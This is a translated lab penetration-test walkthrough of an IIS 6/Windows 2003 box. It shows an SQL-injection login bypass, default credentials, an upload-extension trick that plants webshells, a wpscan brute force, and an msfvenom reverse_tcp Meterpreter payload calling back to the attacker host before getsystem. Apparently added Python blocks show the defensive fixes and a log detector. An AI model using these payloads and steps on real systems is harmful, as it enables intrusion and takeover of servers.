Notes from a test against a 2003 Enterprise Edition box

Preface

Target: IIS 6.x + MSSQL 2008 + PHP 5.2.17 [running under the IIS service account] + MySQL 5.1.x
Attacker box: Kali 2019
Thanks to @klion for providing the environment.
This really drove home the difference between a lab target and a real engagement.

Getting started

Initial testing

An nmap scan first

root@kali:~# nmap -T4 -A -v 192.168.3.5
PORT STATE SERVICE VERSION
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: \xBD\xA8\xC9\xE8\xD6\xD0
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT
81/tcp   open  http          Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCSBTCQS:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Fyblogs\xD0\xC2\xCE\xC5\xCE\xC4\xD5\xC2\xCF\xB5\xCD\xB3
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
82/tcp open http Microsoft IIS httpd 6.0
|_http-favicon: Unknown favicon MD5: C8F6FEA978F73DF79ECF0134FA2129DB
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: IIS6CN
| NetBIOS_Domain_Name: IIS6CN
| NetBIOS_Computer_Name: IIS6CN
| DNS_Domain_Name: iis6cn
| DNS_Computer_Name: iis6cn
|_ Product_Version: 5.2.3790
| http-robots.txt: 11 disallowed entries
| /Admin/ /App_Data/ /App_Themes/ /bin/ /Images/
|_/Install/ /Skin/ /Temp/ /Template/ /Print.aspx /Web.config
|_http-server-header: Microsoft-IIS/6.0
| http-title: \xE7\xBD\x91\xE7\xAB\x99\xE9\xA6\x96\xE9\xA1\xB5-\xE5\x8A\xA8\xE6\x98\x93\xE7\xBD\x91\xE7\xBB\x9C
|_Requested resource was http://192.168.3.5:82/(S(0re5syy1ktjgm145wqtzvp55))/Default.aspx
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
83/tcp open http Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCSBTCQS:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: ASP\xCC\xBD\xD5\xEBV1.93\xA3\xAD\xB0\xA2\xBD\xADhttp://www.ajiang.net
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT
84/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: phpinfo()
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
85/tcp open http Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-robots.txt: 5 disallowed entries
|_/ /admin/ /documents/ /images/ /passwords/
|_http-server-header: Microsoft-IIS/6.0
| http-title: bWAPP - Login
|_Requested resource was login.php
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 R2 3790 Service Pack 2 microsoft-ds
1028/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600.00; RTM
| ms-sql-ntlm-info:
|_ Product_Version: 5.2.3790
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2019-09-17T03:37:13
| Not valid after: 2049-09-17T03:37:13
| MD5: 7ab5 0f37 b867 a9ec 3304 cad9 bf7f 878f
|_SHA-1: 328c c184 6562 b4d9 ed78 6599 5dee e4a9 e77f 2309
|_ssl-date: 2019-09-17T06:37:50+00:00; -1s from scanner time.
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server Microsoft Terminal Service
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Port 23

Nothing found yet.

Port 81: Fyblogs system

A Fyblogs news/article system is running here. Clicking around at random, it felt like there was something to find.
Spent ages trying to get past the WAF (I'm not good at this) with no result.
Found an admin login page; admin:admin got me in, and the CAPTCHA did nothing.
Testing again, the login form also accepts the universal password 'or'='or'. A quick Baidu search showed there is a directory traversal as well; nothing major.
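The "universal password" works because the login code pastes the submitted username and password straight into the SQL text. The following is an added example (my own code, not the Fyblogs code) that shows the vulnerable pattern next to the parameterised query that fixes it, on an in-memory SQLite table with constructed sample credentials. The exact `'or'='or'` string depends on how the target's SQL dialect evaluates a bare string in a boolean context, so the demo uses the `' OR '1'='1` form of the same trick, which SQLite evaluates the way the post describes; that substitution is mine.

```python
import sqlite3


def make_demo_db():
    """Constructed sample table. A real system stores a salted hash and compares in code,
    but the injection shown here does not depend on that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """The pattern behind a 'universal password': user input becomes part of the SQL text,
    so a quote in the input rewrites the WHERE clause."""
    sql = ("SELECT COUNT(*) FROM admin WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    """Parameterised query: the input is bound as data and can never change the WHERE clause."""
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Generic form of the payload discussed above (see the lead-in for why the form differs).
BYPASS = "' OR '1'='1"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, bypass:", login_vulnerable(db, BYPASS, BYPASS))            # True
    print("fixed, bypass:     ", login_fixed(db, BYPASS, BYPASS))                 # False
    print("fixed, real creds: ", login_fixed(db, "admin", "correct-horse-battery"))  # True
```

The fix is the placeholder, not input filtering: the WAF the post mentions was being bypassed precisely because filtering strings is a losing game, while a bound parameter is never parsed as SQL at all.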
Through the directory traversal I found the KindEditor editor, version 3.5.1.
Changing the fileHZ parameter from .jpg lets the jpg upload become our ASP webshell.
Connect with AntSword.
Privileges are too low; commands cannot be executed.
Switch to another target.
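The upload bug above is that the server trusts a client-supplied extension field (fileHZ). The following is an added example (my own code, not KindEditor's) that shows the trusting pattern as a one-line reconstruction and, beside it, a validator that decides from the real file name and the file content only: an extension allow-list, a magic-byte check, and a server-generated name. The `ALLOWED_IMAGE_TYPES` table, the "exactly one dot" rule and the function names are my own choices; a second layer, not shown here, is to keep the upload directory outside any handler mapping so that even a misnamed file is never executed.

```python
import os
import secrets

# Server-side allow-list: extension -> bytes the file must begin with.
ALLOWED_IMAGE_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def insecure_upload_name(form):
    """Reconstruction of the pattern described above (not KindEditor's code):
    the stored extension is whatever the client put in the fileHZ field."""
    return secrets.token_hex(8) + form["fileHZ"]


def validate_upload(original_name, content):
    """Return the normalised extension or raise ValueError.
    Only the real file name and the content are consulted, never a client-supplied
    'extension' field. Names with more than one dot are rejected outright, which is
    deliberately conservative."""
    base = os.path.basename(original_name.replace("\\", "/"))
    if base.count(".") != 1 or base.startswith("."):
        raise ValueError("file name must be name.ext with exactly one extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext == "jpeg":
        ext = "jpg"
    magic = ALLOWED_IMAGE_TYPES.get(ext)
    if magic is None:
        raise ValueError("extension not in allow-list: " + ext)
    if not content.startswith(magic):
        raise ValueError("content does not look like a ." + ext)
    return ext


def safe_upload_name(original_name, content):
    """Random server-generated name plus the validated extension; the original
    name never reaches the filesystem."""
    return secrets.token_hex(8) + "." + validate_upload(original_name, content)


def is_accepted(original_name, content):
    try:
        validate_upload(original_name, content)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    print(safe_upload_name("holiday.JPG", jpeg))
    print(is_accepted("page.asp", b"<% not an image %>"))        # False
    print(is_accepted("page.asp.jpg", jpeg))                     # False
    print(is_accepted("page.jpg", b"<% not an image %>"))        # False
```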

Port 82: PowerEasy (动易网络)

A PowerEasy CMS 3.5 is running.
Found the admin login entry at the bottom of the page.
Baidu says the default account is admin; the password is unknown.
Guessed the admin authentication password to be 8888, then enumerated passwords.
Uploaded an ASPX webshell through the backend.
Privileges are even lower: view only, cannot connect.

Port 83: ASP probe

An ASP probe (server info page) is running here.
Try logging in over 3389.
administrator:admin, and I'm in. 0.0

Port 87: WordPress 3.1.4

root@kali:~# wpscan --url http://192.168.3.5:87 --enumerate u
[+] admin

Now a round of password enumeration.

root@kali:~# wpscan --url http://192.168.3.5:87 -U admin -P /usr/share/seclists/Passwords/cirt-default-passwords.txt
| Username: admin, Password: ADMIN

The admin panel lets you write a webshell directly.
Wrote it into the 404 template, connected with AntSword, and uploaded the backdoor.
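The wpscan run above is two steps a log reviewer can see: a username enumeration followed by a burst of POSTs to wp-login.php from one client, with the last one succeeding. The following is an added example (my own code, not wpscan's or WordPress's) that reads IIS W3C-format log lines and flags that pattern. The `SAMPLE_LOG` excerpt is constructed and reuses the post's lab addresses; the threshold and window are my own choices. It relies on one WordPress behaviour I am confident of: a failed wp-login.php POST is answered with 200 (the form again) and a successful one with a 302 redirect.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt (not from the engagement). One client guesses
# passwords against wp-login.php and the last POST returns 302 (login succeeded).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-09-17 06:40:01 192.168.3.5 GET /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:02 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:02 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:03 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:03 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:04 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 200
2019-09-17 06:40:04 192.168.3.5 POST /wp-login.php - 87 192.168.3.10 302
2019-09-17 06:41:10 192.168.3.5 GET /index.php - 87 192.168.3.20 200
2019-09-17 06:41:11 192.168.3.5 POST /wp-login.php - 87 192.168.3.20 302
"""


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields header."""
    fields, events = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            ev = dict(zip(fields, line.split()))
            ev["ts"] = datetime.strptime(ev["date"] + " " + ev["time"], "%Y-%m-%d %H:%M:%S")
            events.append(ev)
    return events


def detect_login_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Flag a client that fails >= threshold logins inside `window`, and flag it again
    if it then succeeds while the failures are still inside the window.
    Failed wp-login.php POST -> 200; successful one -> 302."""
    alerts, flagged = [], set()
    failures = defaultdict(deque)          # c-ip -> timestamps of recent failures
    for ev in events:
        if ev["cs-method"] != "POST" or ev["cs-uri-stem"] != "/wp-login.php":
            continue
        ip, ts = ev["c-ip"], ev["ts"]
        q = failures[ip]
        while q and ts - q[0] > window:    # drop failures older than the window
            q.popleft()
        if ev["sc-status"] == "200":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("login-burst", ip, len(q)))
        elif ev["sc-status"] == "302" and len(q) >= threshold:
            alerts.append(("login-burst-success", ip, len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect_login_bursts(parse_w3c(SAMPLE_LOG)):
        print(alert)
```

The second alert is the one worth paging on: a burst that ends in a 302 means the guessed password was accepted, which on this box was `ADMIN`. A login-rate limit or lockout on wp-login.php would have stopped the run at the threshold, and the `--enumerate u` step that preceded it is visible as `?author=N` requests in the same log.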

Privilege escalation

Run the backdoor

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.10 lport=4444 -f exe -o test.exe
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.10
msf5 exploit(multi/handler) > exploit

Simple privilege escalation

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The end

If you find any errors, contact lanbaidetanlang@qq.com
